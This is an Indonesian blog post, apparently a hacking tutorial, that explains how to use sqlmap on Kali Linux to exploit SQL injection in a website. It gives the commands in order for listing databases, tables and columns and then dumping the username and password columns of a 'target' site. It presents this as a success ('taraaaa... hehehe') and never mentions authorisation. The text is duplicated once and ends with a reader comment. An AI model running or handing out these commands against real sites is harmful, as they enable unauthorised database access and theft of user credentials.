Cara exploit Sql Injection dengan Sqlmap di kali linux 2.0
asalamualaikum
pada kesempatan kali ini saya mau share tutorial SQL injection dengan Sqlmap di kali linux
apa itu sqlmap?
SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database
tools terbaik untuk mengeksploit bug sql injection ketimbang tools2 sql lainnya
oh ya tutorial kali ini hanya pembelajaran semata
ok saya akan share lengkap dengan gambarnya
siapkan website yang vuln sql injection
lalu buka terminal baru dan ketik perintah
sqlmap -u http://target.com/index.php?id=50 --dbs lalu enter
lihat SS dibawah ini
biarkan tools berjalan jika ada pemberitahuan atau apalah ketik aja y lalu enter lagi
tunggu hingga selesai sampai muncul nama database website target
jika sudah muncul nama database tersebut sekarang ke step selanjutnya
ketik perintah
sqlmap -u http://target.com/index.php?id=50 -D namadatabase --tables
lalu enter
lihat SS dibawah kali ini nama database target saya yaitu public
setelah itu kita tunggu lagi sampai sqlmap membuka semua tables dari database tersebut
jika sudah muncul semua table dari database target selanjutnya kita buka colum table database target ketik perintah
sqlmap -u http://target.com/index.php?id=50 -D namadatabase -T namatable --column
terus akan muncul deh semua colum dari table nya
nah jika sudah muncul semua columnya sekarang kita dump apa yang mau kita dump kali ini saya akan dump username dan password jadi ketik perintah
sqlmap -u http://target.com/index.php?id=50 -D namadatabase -T namacolum -C password,username --dump
lalu enter
tunggu sejenak dan taraaaa username dan password muncul tuh hehehe
sudah jelas kan ??
hehehehe ok deh itu tutorial sql injection dengan sqlmap di kali linux
semoga bermamfaat
jika kurang jelas silahkan komentar
terima kasih kunjungannya :D
pada kesempatan kali ini saya mau share tutorial SQL injection dengan Sqlmap di kali linux
apa itu sqlmap?
SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database
tools terbaik untuk mengeksploit bug sql injection ketimbang tools2 sql lainnya
oh ya tutorial kali ini hanya pembelajaran semata
ok saya akan share lengkap dengan gambarnya
siapkan website yang vuln sql injection
lalu buka terminal baru dan ketik perintah
sqlmap -u http://target.com/index.php?id=50 --dbs lalu enter
lihat SS dibawah ini
biarkan tools berjalan jika ada pemberitahuan atau apalah ketik aja y lalu enter lagi
tunggu hingga selesai sampai muncul nama database website target
jika sudah muncul nama database tersebut sekarang ke step selanjutnya
ketik perintah
sqlmap -u http://target.com/index.php?id=50 -D namadatabase --tables
lalu enter
lihat SS dibawah kali ini nama database target saya yaitu public
setelah itu kita tunggu lagi sampai sqlmap membuka semua tables dari database tersebut
jika sudah muncul semua table dari database target selanjutnya kita buka colum table database target ketik perintah
sqlmap -u http://target.com/index.php?id=50 -D namadatabase -T namatable --column
terus akan muncul deh semua colum dari table nya
nah jika sudah muncul semua columnya sekarang kita dump apa yang mau kita dump kali ini saya akan dump username dan password jadi ketik perintah
sqlmap -u http://target.com/index.php?id=50 -D namadatabase -T namacolum -C password,username --dump
lalu enter
tunggu sejenak dan taraaaa username dan password muncul tuh hehehe
sudah jelas kan ??
hehehehe ok deh itu tutorial sql injection dengan sqlmap di kali linux
semoga bermamfaat
jika kurang jelas silahkan komentar
terima kasih kunjungannya :D
bro? punya saya kok ada error critical dan yang terakhir ada error 404 forbidden di sqlmap nya????
ReplyDelete